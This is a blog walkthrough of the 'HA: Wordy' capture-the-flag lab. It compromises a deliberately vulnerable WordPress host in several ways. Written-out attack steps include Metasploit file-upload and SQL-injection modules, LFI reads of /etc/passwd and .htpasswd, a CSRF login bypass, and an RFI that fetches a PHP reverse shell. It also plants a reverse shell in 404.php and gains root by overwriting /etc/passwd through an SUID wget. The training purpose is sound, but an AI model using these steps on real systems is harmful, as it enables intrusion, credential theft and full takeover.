This is our
Walkthrough for HA: Wordy” and this CTF is design by Hacking Articles Team 😊, hope you will enjoy.
The lab is
designed for Beginners for WordPress Penetration Testing Practices. This lab is
designed as a Capture the flag and not as a boot to root, but it contains
multiple Vulnerabilities (OWASP Top-10) that should be exploited to complete
this CTF Challenge. This helps the CTF player to understand all the ways in
which a WordPress machine can be vulnerable.
Level: Easy
You can download
this lab from here.
Penetration Testing
Methodology
Network Scanning
·
Host IP (Netdiscover)
·
Open Port & Services (Nmap)
Enumeration
·
Web Directory Brute force (Dirb)
·
Scanning WordPress (Wpscan)
Exploiting Reflex Gallery (1st
Method: file Upload)
·
Spawning Shell (Metasploit)
·
Capture the 1st flag
Privilege Escalation
·
Abusing SUID Binaries
·
Capture 2nd Flag
Exploiting Mail_Masta &
WP_Support (2nd Method- LFI & CSRF)
·
LFI
·
CSRF
·
Capture the flag
·
Inject PHP malicious code
·
Spawning Shell (Netcat)
Exploiting WP_Symposium (3rd Method:
SQL Injection)
·
Web Directory Enumeration
(Dirb)
·
Obtaining Database Info
(Metasploit)
Exploit Gwolle Guestbook (4th Method:
RFI)
·
Inject PHP malicious code
·
Spawning Shell (Netcat)
Exploit Slideslow Gallery (5th
Method: Authenticated File_Upload)
·
Spawning Shell (Metasploit)
Walkthrough
Starting with
netdiscover, to identify host IP address and thus we found 192.168.0.27. let’s
now go for advance network scanning using nmap aggressive scan.
nmap -A
192.168.0.27
We saw from the
scan result that the port 80 open which is hosting Apache httpd service.
Since we got the
port 80 open, we decided to browser the IP Address in the browser but found
nothing.
Further we move
for directory enumeration and use dirb for brute forcing.
dirb http://192.168.0.27/
This gave us a
directory called “wordpress” as shown in the given image.
Upon finding the
directory, we opened the URL in our browser.
Now that we have
the wordpress site, it’s logical to perform a wpscan on our lab.
wpscan --url
http://192.168.0.27/wordpress --enumerate p
Now we move
further down in the wpscan result and found the reflex gallery plugin. It is
vulnerable to the File Upload. As you can observe that it has shown Metasploit
module for exploiting reflex gallery.
Exploiting Reflex
Gallery (1st Method: File Upload )
Thus, we use the following module and set
the argument such as rhosts and targeturi and then run the exploit to get the
meterpreter session.
msf5 > use
exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 > set
rhosts 192.168.0.27
msf5 > set
targeturi /wordpress
msf5 >
exploit
Boom!! Here we
have our meterpreter session which you can observe in the given below image.
meterpreter
> shell
meterpreter
> python3 -c ‘import pty; pty.spawn(/”bin/sh”)’
Privilege Escalation
As soon as we
gained the proper shell, we enumerated the machine for flags. We found
flag1.txt in the /home/raj/ directory
cd /home
ls
cd raj
ls
cat flag1.tx
Now for
privilege escalation It is a regular practice to check for any file having SUID
permissions with the help of “Find” command. We used the following
command to enumerate all binaries having SUID permissions:
find / -perm
-u=s -type f 2>/dev/null
Find command shown
that wget and cp command have the SUID permissions. This could be
a possible for escalating root privilege.
SUID Binaries
command gave us all the sensitive files that can be read/write and hence with
the help of wget command we can overwrite the /etc/passwd.
Now we are
creating the salt value of password for our new user and this will be done by
using “openssl” following command as mentioned in the screenshot below:
openssl
passwd -1 -salt ignite pass123
And we will get
our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; This
is going to help us create an entry of our user in the /etc/passwd file of the
target machine. Now we have copied the entire content of /etc/passwd file as
shown in the below image in our local machine.
cd /home/raj
cat
/etc/passwd
After pasting
above copied content, we will edit a new record for the user “ignite” then
paste the above-copied hash password in the record as shown below.
cat
/etc/passwd
Now we want to overwrite
passwd file inside /etc folder to replace the original passwd file. We can use
wget with -O to download the passwd file from our machine inside a /etc
directory which will overwrite the existing passwd file.
cd /home/raj
cd /etc
wget -O
passwd http://192.168.0.16:8000/passwd
Now when you
check, you will see that the / etc / passwd file has been updated as shown in
the image below.
tail
/etc/passwd
Now let’s try to
access root shell and we have to switch user as ignite for escalating
privileges.
su ignite
cd /root
ls
cat proof.txt
Awesome!! We
found the final flag along with root privileges. Let’s go for 2nd
method……..
We can solve the
lab using another method as well. Earlier our Wpscan showed us the Mail Masta
plugin which is vulnerable to LFI (Local File Inclusion). On exploring the
following link, we got
proof-of-concept would be to load passwd file.
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
So, we framed
our URL to exploit the LFI It turned out to be like this:
http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Now we browsed
the URL in our browser to find the output of cat command on /etc/passwd file.
Now after some
enumeration, we found that there are some credentials stored inside the
/etc/apache2/.htpasswd. So, let’s read them using curl while exploiting LFI.
curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd
We were
successful in obtaining a hash. It seemed like Base64 Encryption. We used the
base64 command with -d parameter to decode this hash as shown in the image.
echo
“YWFydGk6YWFydGlAZ21haWwuY29t” | base64 -d
It turned out to
be aarti:aarti@gmail.com. This must be login details but there is no password.
Aarti is a member
of wordpress and server user account. We can confirm this from our previous
assessment of wpscan result. It shows 2 users admin and aarti.
CSRF:WP
Support Plus Responsive Ticket
When we scanned
wordpress with wpscan for vulnerable plugins, we found many of them and here,
one by one we can exploit them to our desire. To do so, we will use
searchsploit in order to find exploits for wp support as this was hinted
to us during the said scan. Therefore, type the following for this:
searchsploit
wp-support
searchsploit
-m 41006
cat 41006.txt
Once the above
commands are executed, we will now copy the highlighted content and modify it (as
shown in the image below) to change username value to “aarti” and email
value to “aarti@gmail.com” :
Username:
As we execute
the above script, the webpage will be directed to the log in screen; asking us
the username, which we have already found.
Here, as soon as
we click on login button, we will be logged in as a user without entering
password because of incorrect usage of wp_set_auth_cookie() due to CSRF
vulnerability.
While traversing
the website we found a second flag and a root password in biographical
info.
The password we
found was encoded using base64 algorithm. To decrypt the password, we used the
following command :
echo
“SWduaXRlQDEyMw==” | base64 -d
Upon decryption
we found the root password is Ignite@123. This is the password for the admin
user in Wordpress.
Now, to proceed
further we used the php reverse shell. We changed the IP Address to our current
IP Address and give any port you want and start netcat listener for obtaining
reverse connection.
And then we
copied the above php-reverse-shell and paste it in 404.php template of
wordpress as shown in the image below :
Then after
saving the 404.php file we will run the file through URL in a browser as shown
in the image below :
Simultaneously,
when you run netcat, you will have your session upon execution of 404.php file.
Access netcat using the following command :
nc -lvp 1234
Exploiting WP_Symposium
(3rd Method: SQL Injection)
Enumeration
To further
enumerate, we performed a Directory Bruteforce. There are a lot of situations
where we need to extract the directories with specific extension over the
target server, and for this we can use the -X parameter in dirb scan. This
parameter accepts the file extension name and then searches the given extension
files over the target server or machine. For instance, here we need to find
text files, so we will use the following command for it :
dirb
http://192.168.0.27 -X .txt
Among all the
text files the message in notes.txt stood out. It said, “you need to zip your
way out” and this message is obviously a hint to look for a zip file.
Now, again we
will use dirb -X extension to find zip.
dirb
http://192.168.0.27 -X .zip
Upon finding a
zip file and then we download the file using the following wget and then unzip
the command:
wget
http://192.168.0.27/secret.zip
unzip
secret.zip
To unzip the
file successfully, you will need a password because it was a password protected
zip file, but as we don’t know the said password, we will try to exploit a
plugin.
We will use
WordPress plugin wp-symposium version 15.5.1 which allows to retrieve
all the database content, which includes users’ details and password.
Luckily, we
found exploit for this vulnerability inside Metasploit framework and thus load
the below module and execute following command
use
auxiliary/admin/http/wp_symposium_sql_injection
msf
auxiliary(wp_symposium_sql_injection) > set rhosts 192.168.0.27
msf
auxiliary(wp_symposium_sql_injection) > set targeturi /wordpress
msf
auxiliary(wp_symposium_sql_injection) > exploit
Nice!!! Here we
found the relevant username and email id as user: admin and aarti respectively.
Now will unzip
the file we found earlier that is secret.zip with hash we found in wp-symposium
exploit.
cat link.txt
As soon as we
unzip the file, we found that this lab can be solved with multiple ways with
the list of exploits.
Exploit Gwolle Guestbook (4th
Method: RFI)
Now again we
will run wpscan to enumerate the themes and plugins and find a vulnerable
plugin called “Gwolle Guestbook”. We search for the exploit and find that it is
vulnerable to Remote File Inclusion (RFI).
We will follow
the instructions according to the given POC on exploit-db and use the
php-reverse-shell.php available on Kali Linux. We will copy it to desktop and
rename it to wp-load.php. To execute our php shell using RFI we will start
our python HTTP server to exploit RFI on the target machine.
mv
php-reverse-shell.php shell.phpwp-load.php
python -m
SimpleHTTPServer
We set up our
listener using netcat; as soon as we execute our php shell through RFI, we are
successfully able to get a reverse shell.
http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php
Now we will
exploit another vulnerable plugin that we found in secret.zip. The WordPress
SlideShow Gallery plugin contains an authenticated file upload vulnerability.
An attacker can upload arbitrary files to the upload folder. Since the plugin
uses its own file upload mechanism instead of the WordPress API, it’s possible
to upload any file type.
Metasploit
You will get
exploit for this vulnerability inside Metasploit framework and thus load the
below module and execute following command:
use
exploit/unix/webapp/wp_slideshowgallery_upload
set targeturi
/wordpress
set rhosts
192.168.0.27
set wp_user
admin
set
wp_password Ignite@123
exploit
As the above
commands are executed, you will have your meterpreter session. Just as
portrayed in this article, there are multiple methods to exploit a wordpress
platformed website.
0 comments:
Post a Comment